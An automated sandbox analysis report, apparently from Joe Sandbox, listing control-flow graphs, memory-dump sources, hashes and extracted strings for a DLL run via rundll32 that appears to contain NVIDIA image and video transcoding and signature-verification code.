                                                                                                                                  control_flow_graph 600 7ffd92ed2e50-7ffd92ed2e9c call 7ffd92dd6fc0 GetModuleFileNameA 603 7ffd92ed2ee1-7ffd92ed2ee9 600->603 604 7ffd92ed2e9e-7ffd92ed2ea0 600->604 605 7ffd92ed348b-7ffd92ed34a9 call 7ffd92dc4d90 603->605 606 7ffd92ed2eef-7ffd92ed2ef7 603->606 607 7ffd92ed2ea2-7ffd92ed2eaa 604->607 608 7ffd92ed2ebd-7ffd92ed2edb call 7ffd92db79c0 604->608 606->605 610 7ffd92ed2efd-7ffd92ed2f05 606->610 611 7ffd92ed2eb0-7ffd92ed2eb3 607->611 608->603 608->605 610->605 615 7ffd92ed2f0b-7ffd92ed2f13 610->615 611->608 616 7ffd92ed2eb5-7ffd92ed2ebb 611->616 615->605 617 7ffd92ed2f19-7ffd92ed2f21 615->617 616->608 616->611 617->605 618 7ffd92ed2f27-7ffd92ed2f2f 617->618 618->605 619 7ffd92ed2f35-7ffd92ed2f8e 618->619 620 7ffd92ed2f94-7ffd92ed2fba GetSystemDirectoryW LocalAlloc 619->620 621 7ffd92ed301f 619->621 623 7ffd92ed2fbc-7ffd92ed2fc3 620->623 624 7ffd92ed2fc5-7ffd92ed2fde GetSystemDirectoryW 620->624 622 7ffd92ed3026-7ffd92ed303e LoadLibraryExW 621->622 625 7ffd92ed304f-7ffd92ed3051 622->625 626 7ffd92ed3040-7ffd92ed3049 GetLastError 622->626 623->622 627 7ffd92ed2fee-7ffd92ed2ff7 624->627 628 7ffd92ed2fe0-7ffd92ed2feb 624->628 630 7ffd92ed3057-7ffd92ed307f GetSystemDirectoryW LocalAlloc 625->630 631 7ffd92ed30de 625->631 626->625 629 7ffd92ed3419-7ffd92ed3423 626->629 632 7ffd92ed3000-7ffd92ed3017 627->632 628->627 635 7ffd92ed345b-7ffd92ed3483 629->635 636 7ffd92ed3425-7ffd92ed3455 LocalFree * 6 629->636 633 7ffd92ed308a-7ffd92ed30a2 GetSystemDirectoryW 630->633 634 7ffd92ed3081-7ffd92ed3088 630->634 637 7ffd92ed30e5-7ffd92ed30fd LoadLibraryExW 631->637 632->632 638 7ffd92ed3019-7ffd92ed301d 632->638 639 7ffd92ed30b1-7ffd92ed30ba 633->639 640 7ffd92ed30a4-7ffd92ed30ae 633->640 634->637 635->605 636->635 641 7ffd92ed310e-7ffd92ed3110 637->641 642 7ffd92ed30ff-7ffd92ed3108 GetLastError 637->642 638->622 643 7ffd92ed30c0-7ffd92ed30d6 639->643 640->639 644 7ffd92ed3116-7ffd92ed313e GetSystemDirectoryW LocalAlloc 641->644 645 7ffd92ed319e 641->645 642->629 642->641 643->643 649 7ffd92ed30d8-7ffd92ed30dc 643->649 646 7ffd92ed3149-7ffd92ed3161 GetSystemDirectoryW 644->646 647 7ffd92ed3140-7ffd92ed3147 644->647 648 7ffd92ed31a5-7ffd92ed31bd LoadLibraryExW 645->648 650 7ffd92ed3163-7ffd92ed316d 646->650 651 7ffd92ed3170-7ffd92ed3179 646->651 647->648 652 7ffd92ed31ce-7ffd92ed31d0 648->652 653 7ffd92ed31bf-7ffd92ed31c8 GetLastError 648->653 649->637 650->651 654 7ffd92ed3180-7ffd92ed3196 651->654 655 7ffd92ed31d6-7ffd92ed31fe GetSystemDirectoryW LocalAlloc 652->655 656 7ffd92ed325e 652->656 653->629 653->652 654->654 658 7ffd92ed3198-7ffd92ed319c 654->658 659 7ffd92ed3209-7ffd92ed3221 GetSystemDirectoryW 655->659 660 7ffd92ed3200-7ffd92ed3207 655->660 657 7ffd92ed3265-7ffd92ed327d LoadLibraryExW 656->657 661 7ffd92ed328e-7ffd92ed3290 657->661 662 7ffd92ed327f-7ffd92ed3288 GetLastError 657->662 658->648 663 7ffd92ed3223-7ffd92ed322d 659->663 664 7ffd92ed3230-7ffd92ed3239 659->664 660->657 665 7ffd92ed3296-7ffd92ed32be GetSystemDirectoryW LocalAlloc 661->665 666 7ffd92ed331e 661->666 662->629 662->661 663->664 667 7ffd92ed3240-7ffd92ed3256 664->667 669 7ffd92ed32c9-7ffd92ed32e1 GetSystemDirectoryW 665->669 670 7ffd92ed32c0-7ffd92ed32c7 665->670 671 7ffd92ed3325-7ffd92ed333d LoadLibraryExW 666->671 667->667 668 7ffd92ed3258-7ffd92ed325c 667->668 668->657 672 7ffd92ed32f1-7ffd92ed32fa 669->672 673 7ffd92ed32e3-7ffd92ed32ee 669->673 670->671 674 7ffd92ed334e-7ffd92ed3350 671->674 675 7ffd92ed333f-7ffd92ed3348 GetLastError 671->675 678 7ffd92ed3300-7ffd92ed3316 672->678 673->672 676 7ffd92ed3356-7ffd92ed337e GetSystemDirectoryW LocalAlloc 674->676 677 7ffd92ed33e3 674->677 675->629 675->674 679 7ffd92ed338a-7ffd92ed33a1 GetSystemDirectoryW 676->679 680 7ffd92ed3380-7ffd92ed3388 676->680 681 7ffd92ed33ea-7ffd92ed3402 LoadLibraryExW 677->681 678->678 682 7ffd92ed3318-7ffd92ed331c 678->682 683 7ffd92ed33a3-7ffd92ed33ad 679->683 684 7ffd92ed33b0-7ffd92ed33b9 679->684 680->681 685 7ffd92ed3404-7ffd92ed340d GetLastError 681->685 686 7ffd92ed340f 681->686 682->671 683->684 687 7ffd92ed33c0-7ffd92ed33d4 684->687 685->629 685->686 686->629 687->687 688 7ffd92ed33d6-7ffd92ed33e1 687->688 688->681
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLocalSystem$AllocErrorFreeLastLibraryLoad$FileModuleName
                                                                                                                                  • String ID: \mfpmp.exe$cryptbase.dll$cryptnet.dll$devobj.dll$drvstore.dll$msasn1.dll$wldp.dll
                                                                                                                                  • API String ID: 1091566109-3852175644
                                                                                                                                  • Opcode ID: 4abbe1daccf4be878ad19c12dbb057b041b05a0faf224e1ad032174ad0e4b94a
                                                                                                                                  • Instruction ID: 6c2cb76f35f6466fe6ea0bb3969216e1887b70de56c9da412919da3ea38fd90e
                                                                                                                                  • Opcode Fuzzy Hash: 4abbe1daccf4be878ad19c12dbb057b041b05a0faf224e1ad032174ad0e4b94a
                                                                                                                                  • Instruction Fuzzy Hash: DE02AF72B08A8286F7768F92A4643BA33A5FF84B45F444239C94E53B54EF7DE418C740
                                                                                                                                  Function 00007FFD92DC3970 Relevance: 65.8, APIs: 7, Strings: 30, Instructions: 1017COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - CreateFormatConverter failed with %x error,$%s - DirectBlend object not ready, returning error,$%s - Invalid Params, image width - %x, Image height - %x greater than specified desitnation width - %x or destination height - %x,$%s - QI on IDXGISurface failed, error - %x$%s - allocResources failed with %x error,$%s Notable to allocate memory for up, returning error$%s: Surface didnt return a QI to a ID3D11Texture2D surface $%s: handleSurfaceBlt failed for source surface from D2D bitmap, error - %x $/tEXt/Software$/tEXt/SubType$After WriteSource$Before WriteSource$CNvWICImageTranscoderEx::performImageTransform$CNvWICImageTranscoderEx::performImageTransform$CreateDecoderFromFilename failed with %x error$Exit performImageTransform$Failed to delete 0KB file$GEFORCE SHARE$GetColorContexts failed with %x error$GetContainerFormat returned GUID for input image- {%08lX-%04hX-%04hX-%02hhX%02hhX-%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX} for Frame:$GetSize on the decoder object failed with %x error$NGXSuperResolution$No input file specified$Not initialized$Unable to copy color contexts failed with %x error$m_pEncoder CreateNewFrame failed with %x error$pBitmapFrameEncode->Commit failed with %x error$pBitmapFrameEncode->GetMetadataQueryWriter failed with %x error$pBitmapFrameEncode->Initialize failed with %x error$pBitmapFrameEncode->WriteSource failed with %x error
                                                                                                                                  • API String ID: 0-3877869248
                                                                                                                                  • Opcode ID: e9d8d0fb7bf29b4403d324951166c1d39d0a5a177f2d19678a834bbb287def2f
                                                                                                                                  • Instruction ID: 7b00f0fd76fb4f942b32aac610c5ac4d3b6ef8878e034a1131b0d1e251aa45d2
                                                                                                                                  • Opcode Fuzzy Hash: e9d8d0fb7bf29b4403d324951166c1d39d0a5a177f2d19678a834bbb287def2f
                                                                                                                                  • Instruction Fuzzy Hash: 15C23876709B8686EB70CF99E4A47AA73A4FB88B85F004136CA8D47B64DF7DD444DB00
                                                                                                                                  Function 00007FFD92DB7020 Relevance: 53.0, APIs: 5, Strings: 25, Instructions: 520synchronizationCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 985 7ffd92db7020-7ffd92ea0ea1 987 7ffd92ea0ead-7ffd92ea0ed7 985->987 988 7ffd92ea0ea3-7ffd92ea0ea8 985->988 992 7ffd92ea0ed9-7ffd92ea0ef2 call 7ffd930e09e8 987->992 993 7ffd92ea0f11-7ffd92ea0f13 987->993 989 7ffd92ea0f48-7ffd92ea0f6d call 7ffd92dda4b0 988->989 998 7ffd92ea0f75-7ffd92ea0f7f 989->998 999 7ffd92ea0f6f SetEvent 989->999 992->993 1008 7ffd92ea0ef4-7ffd92ea0f01 992->1008 996 7ffd92ea0f15-7ffd92ea0f18 993->996 997 7ffd92ea0f40 993->997 1003 7ffd92ea0f1e-7ffd92ea0f35 996->1003 1004 7ffd92ea1123-7ffd92ea112b 996->1004 1005 7ffd92ea0f43 997->1005 1000 7ffd92ea0fc6-7ffd92ea0fdc call 7ffd92ddd530 998->1000 1001 7ffd92ea0f81-7ffd92ea0f8e WaitForSingleObject 998->1001 999->998 1022 7ffd92ea1029-7ffd92ea106b call 7ffd92dda180 call 7ffd92dda4b0 1000->1022 1023 7ffd92ea0fde-7ffd92ea0ff1 1000->1023 1006 7ffd92ea0fab-7ffd92ea0fbf CloseHandle 1001->1006 1007 7ffd92ea0f90-7ffd92ea0fa6 call 7ffd92dda4b0 1001->1007 1010 7ffd92ea10eb-7ffd92ea1118 PropVariantClear 1003->1010 1011 7ffd92ea0f3b 1003->1011 1012 7ffd92ea116a-7ffd92ea116f 1004->1012 1013 7ffd92ea112d-7ffd92ea1134 1004->1013 1005->989 1006->1000 1007->1006 1008->993 1015 7ffd92ea0f03-7ffd92ea0f0c 1008->1015 1010->997 1028 7ffd92ea111e 1010->1028 1011->997 1018 7ffd92ea1175-7ffd92ea11ba call 7ffd92ddd530 1012->1018 1019 7ffd92ea168e-7ffd92ea16a5 call 7ffd92dda4b0 1012->1019 1013->1012 1017 7ffd92ea1136-7ffd92ea1153 call 7ffd92dc9ad0 1013->1017 1015->993 1033 7ffd92ea15a7 1017->1033 1034 7ffd92ea1159-7ffd92ea1165 call 7ffd92dda4b0 1017->1034 1041 7ffd92ea16aa-7ffd92ea16c1 call 7ffd92dda4b0 1018->1041 1042 7ffd92ea11c0-7ffd92ea11c8 1018->1042 1019->1005 1045 7ffd92ea106d 1022->1045 1046 7ffd92ea1071-7ffd92ea1079 1022->1046 1023->1022 1038 7ffd92ea0ff3-7ffd92ea1024 call 7ffd92dda4b0 * 2 1023->1038 1028->1004 1037 7ffd92ea15ae-7ffd92ea15c1 call 7ffd92dda4b0 1033->1037 1034->1012 1037->989 1038->1022 1041->989 1042->1041 1048 7ffd92ea11ce-7ffd92ea11d3 1042->1048 1045->1046 1052 7ffd92ea107b-7ffd92ea1088 1046->1052 1053 7ffd92ea108d-7ffd92ea1090 1046->1053 1054 7ffd92ea11d5-7ffd92ea11ef call 7ffd92dcb890 1048->1054 1055 7ffd92ea123e-7ffd92ea124c 1048->1055 1052->1053 1058 7ffd92ea10a2-7ffd92ea10ac call 7ffd92dcc330 1053->1058 1059 7ffd92ea1092-7ffd92ea1098 1053->1059 1068 7ffd92ea15c6-7ffd92ea15cd 1054->1068 1069 7ffd92ea11f5-7ffd92ea123c call 7ffd92dda4b0 * 2 1054->1069 1060 7ffd92ea124e-7ffd92ea126b 1055->1060 1061 7ffd92ea1270-7ffd92ea1286 call 7ffd92dda180 1055->1061 1075 7ffd92ea10c9-7ffd92ea10ea call 7ffd92dc4d90 1058->1075 1076 7ffd92ea10ae-7ffd92ea10c4 call 7ffd92dda4b0 1058->1076 1059->1058 1071 7ffd92ea158f-7ffd92ea1596 1060->1071 1072 7ffd92ea1288-7ffd92ea1299 1061->1072 1073 7ffd92ea12c7-7ffd92ea12ca 1061->1073 1068->1037 1069->1055 1071->1004 1078 7ffd92ea159c-7ffd92ea15a2 1071->1078 1072->1073 1079 7ffd92ea129b-7ffd92ea12c0 call 7ffd92dda4b0 1072->1079 1081 7ffd92ea14b8-7ffd92ea14bd 1073->1081 1082 7ffd92ea12d0-7ffd92ea12dd 1073->1082 1076->1075 1078->1005 1079->1073 1087 7ffd92ea1678-7ffd92ea1689 call 7ffd92dda4b0 1081->1087 1088 7ffd92ea14c3-7ffd92ea14c5 1081->1088 1086 7ffd92ea12e0-7ffd92ea12eb 1082->1086 1092 7ffd92ea130e-7ffd92ea131e 1086->1092 1093 7ffd92ea12ed-7ffd92ea130c 1086->1093 1087->1019 1088->1019 1095 7ffd92ea14cb-7ffd92ea14d3 1088->1095 1096 7ffd92ea1322-7ffd92ea1333 call 7ffd92ed6fae 1092->1096 1093->1096 1095->1019 1098 7ffd92ea14d9-7ffd92ea1508 1095->1098 1102 7ffd92ea1335-7ffd92ea1339 1096->1102 1103 7ffd92ea133c-7ffd92ea133e 1096->1103 1109 7ffd92ea150a-7ffd92ea1517 1098->1109 1110 7ffd92ea1520-7ffd92ea1539 call 7ffd92dd7530 1098->1110 1102->1103 1104 7ffd92ea1619-7ffd92ea1637 call 7ffd92dda4b0 1103->1104 1105 7ffd92ea1344-7ffd92ea1364 call 7ffd92dbe5e0 1103->1105 1104->1005 1105->1086 1114 7ffd92ea136a-7ffd92ea13a1 SetEvent 1105->1114 1109->1110 1119 7ffd92ea1658-7ffd92ea1673 call 7ffd92dda4b0 1110->1119 1120 7ffd92ea153f-7ffd92ea1547 1110->1120 1117 7ffd92ea13ae-7ffd92ea13b1 1114->1117 1118 7ffd92ea13a3-7ffd92ea13a8 1114->1118 1125 7ffd92ea13b7-7ffd92ea13c4 1117->1125 1126 7ffd92ea15ee 1117->1126 1118->1117 1122 7ffd92ea13aa 1118->1122 1119->997 1123 7ffd92ea1549-7ffd92ea1556 1120->1123 1124 7ffd92ea155f-7ffd92ea1579 1120->1124 1122->1117 1123->1124 1135 7ffd92ea1588-7ffd92ea158d 1124->1135 1136 7ffd92ea157b-7ffd92ea1582 1124->1136 1127 7ffd92ea1426-7ffd92ea148f 1125->1127 1128 7ffd92ea13c6-7ffd92ea13d5 call 7ffd92dd94c0 1125->1128 1130 7ffd92ea15f3 1126->1130 1142 7ffd92ea14a9-7ffd92ea14ad 1127->1142 1143 7ffd92ea1491-7ffd92ea14a4 call 7ffd92dda4b0 1127->1143 1144 7ffd92ea13d7-7ffd92ea13ea 1128->1144 1145 7ffd92ea1400-7ffd92ea1407 1128->1145 1134 7ffd92ea15f6-7ffd92ea1614 call 7ffd92dda4b0 1130->1134 1134->1005 1135->1071 1136->1135 1141 7ffd92ea163c-7ffd92ea1653 call 7ffd92dda4b0 1136->1141 1141->1005 1142->1134 1150 7ffd92ea14b3 1142->1150 1143->1142 1144->1145 1151 7ffd92ea13ec-7ffd92ea13f7 1144->1151 1146 7ffd92ea141a-7ffd92ea1420 1145->1146 1147 7ffd92ea1409-7ffd92ea1411 1145->1147 1146->1127 1152 7ffd92ea15cf-7ffd92ea15ec call 7ffd92dda4b0 1146->1152 1147->1146 1150->1081 1151->1145 1152->1130
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$ClearCloseHandleObjectPropSingleVariantWait
                                                                                                                                  • String ID: $%s - time-taken for Flush: %lf mecs, transcoded %d frames$%s - time-taken for ReadSample(decode): %lf mecs, transcoded %d frames$%s: CreateGifEncoder failed with error - %x$%s: GetVideoFormat failed with error - %x, possibly invalid video stream$%s: HandleConversion routine failed. Error - %x$%s: InitializeTranscodeState done successfully, ready for transcode$%s: InitializeTranscodeState returned error - %x, returning error$%s: MF_SOURCE_READERF_CURRENTMEDIATYPECHANGED recieved for video stream$%s: Main processing thread finished processing, hr value - %x$%s: Not able to create system memory buffer. Error - %x$%s: Transcode operation failed. Error - %x$%s: Video stream Format Width - 0x%x, Height - 0x%x, Sample width - 0x%x, Sample height - 0x%x$%s: failed to create encoder object$%s: failed to initialize encoder object$%s: flushandReleaseEncoder failed, Error - %x$%s:FlushGif failed with %x return value$%s:WaitForSingleObject for thread handle failed with %x return value$:pSampleTmp NULL, possibly EOS$CNvVideoTranscode::CreateGifEncoder$CNvVideoTranscode::FlushGif$CNvVideoTranscode::TranscodeVideo$End of Stream$Maximum Frame Count as specified - %d, reached$No sample
                                                                                                                                  • API String ID: 148790452-735870442
                                                                                                                                  • Opcode ID: f344703b25434339ed57f5c68d3d14fce1a39faf7061b5202ae6c44010f9219a
                                                                                                                                  • Instruction ID: 7f0afc5ab7f4553a86eaf1e7ce97d0a08d7199c112a0e5bd2c2f75a25f1c5d8d
                                                                                                                                  • Opcode Fuzzy Hash: f344703b25434339ed57f5c68d3d14fce1a39faf7061b5202ae6c44010f9219a
                                                                                                                                  • Instruction Fuzzy Hash: FB328076B08B4282FB308FA5E4A03A92764FB84B89F444136DE4D6BB98DF7DE405C750
                                                                                                                                  Function 00007FFD92DBB800 Relevance: 49.1, APIs: 13, Strings: 15, Instructions: 138libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionInfoMaskVerifyVersion
                                                                                                                                  • String ID: CertCloseStore$CertFindCertificateInStore$CertFreeCertificateContext$CertGetIssuerCertificateFromStore$CertGetNameStringA$CryptDecodeObjectEx$CryptMsgClose$CryptMsgGetParam$CryptQueryObject$WTHelperGetProvCertFromChain$WTHelperGetProvSignerFromChain$WTHelperProvDataFromStateData$WinVerifyTrust$crypt32.dll$wintrust.dll
                                                                                                                                  • API String ID: 1813986628-3512795598
                                                                                                                                  • Opcode ID: 25b3f02b4c43d9b760aa53d465be3eafec4f552b3dd47f5ff796ec9f328cbd36
                                                                                                                                  • Instruction ID: b05d119dfedef627ec0027b8a9d6ab21bebd1a9b522edd6049dbb638c683e745
                                                                                                                                  • Opcode Fuzzy Hash: 25b3f02b4c43d9b760aa53d465be3eafec4f552b3dd47f5ff796ec9f328cbd36
                                                                                                                                  • Instruction Fuzzy Hash: B981D368F0AB4384FA70DFD5B8B833022ACBF44745F851139D80DA6AA4EFBDA454A304
                                                                                                                                  Function 00007FFD92DC54B0 Relevance: 46.2, APIs: 5, Strings: 21, Instructions: 740COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
